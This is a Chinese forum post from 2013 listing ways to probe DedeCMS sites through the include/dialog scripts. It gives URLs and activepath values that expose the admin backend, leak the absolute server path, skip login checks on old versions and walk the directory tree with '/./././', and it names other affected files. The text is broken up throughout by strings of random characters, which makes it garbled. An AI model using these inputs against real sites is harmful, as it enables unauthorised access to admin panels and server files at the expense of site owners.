1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理. O' ]: p2 U o, ]/ Y. `
: e% z* ?0 F# N/ b0 b
员帐号,新版本的就直接转向了后台.5 ]2 r( d+ ?, s" e# N/ S
8 u% T: W0 a, T" l6 |2.include/dialog/config.php会爆出后台管理路径& l# W5 V. o" P: F: X/ h% U/ ~0 a
7 y( [$ K* u# c. O4 T7 M3 A
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录) m0 x9 p3 f! b1 L
3 P3 G% N: D+ N5 s+ b
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
( Z) \' t3 x Y/ d1 N" ]% {; g7 H* g6 _1 V/ l
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉4 j6 D" G) _7 e8 _- b. e
$ O& Q; E8 c( T到根目录去.不过这些版本的访问地址有些不同.: j: _- i H% e" t3 n6 o
地址为require/dialog/select_soft.php?activepath=/././././././././
1 l+ m+ J- q& J: O) a. k* e' ~$ X7 q- C
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
% j9 L5 Y) ~, }8 S+ ~: p% J) U( n存在相同问题的文件还有3 h9 B. ~; @6 s2 E1 f; \
include\dialog\select_images.php
1 {& S5 P7 S3 n+ ?& Y: J8 n- Rinclude\dialog\select_media.php7 G( d* H; ?% ~9 {
include\dialog\select_templets.php
) @' Z( R. H [/ \ |
发表于 2013-4-16 16:50:43
收藏
支持
反对